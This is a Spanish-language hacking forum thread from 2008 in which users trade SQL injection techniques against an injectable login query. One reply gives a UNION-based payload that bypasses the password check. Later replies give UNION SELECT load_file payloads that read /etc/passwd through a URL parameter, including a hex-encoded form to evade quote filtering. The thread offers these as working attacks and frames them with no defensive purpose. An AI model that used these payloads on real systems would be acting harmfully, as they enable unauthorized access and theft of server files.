Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Bugs y Exploits => Hacking => Nivel Web => Mensaje iniciado por: APOKLIPTICO en 1 Octubre 2008, 18:41 PM

Título: SQL injection...
Publicado por: APOKLIPTICO en 1 Octubre 2008, 18:41 PM
Hola gente, tengo una duda, que puedo explotar en la siguiente query:

Código (sql) [Seleccionar]
SELECT clave FROM users WHERE us='{X}'

Puedo inyectar en {X}, pero no acepta comandos concatenados (poner ";" y poner despues otro comando).

A alguien se le ocurre algo???
Título: Re: SQL injection...
Publicado por: s E t H en 1 Octubre 2008, 20:21 PM
usandio union capaz?
http://sql.1keydata.com/es/sql-union.php
Título: Re: SQL injection...
Publicado por: APOKLIPTICO en 1 Octubre 2008, 23:09 PM
Pero no me va a devolver la tabla usando UNION, xq lo q hace es buscar el password en la tabla, lo almacena en una variable y despues lo compara con el q le pones como "password"...
Título: Re: SQL injection...
Publicado por: sirdarckcat en 2 Octubre 2008, 02:49 AM
usuario: ' union select 'lalala
password: lalala
Título: Re: SQL injection...
Publicado por: APOKLIPTICO en 2 Octubre 2008, 02:59 AM
Claro! como no lo habia pensado...
Graciass!!
Título: Re: SQL injection...
Publicado por: Eazy en 2 Octubre 2008, 22:32 PM
Para no crear un nuevo tema, alguien sabe como usar la funcion Load_file en una inyeccion mysql?
Título: Re: SQL injection...
Publicado por: Azielito en 3 Octubre 2008, 00:54 AM
es con union select creo recordar

union select

Código (sql) [Seleccionar]
union select 1,load_file(archivo),2,3...


foro.elhacker.net/bugs_y_exploits/dataextract_databaseuserversion_by_ozx-t229414.0.html
Título: Re: SQL injection...
Publicado por: pepeluxx en 5 Octubre 2008, 13:05 PM
http://www.site.com/?id=-1 union select 1,load_file('/etc/passwd'),3,...

o si filtra las comillas, en HEX:

http://www.site.com/?id=-1 union select 1,load_file(0x2f6574632f706173737764),3,...
Título: Re: SQL injection...
Publicado por: Eazy en 6 Octubre 2008, 00:24 AM
Gracias gente ;)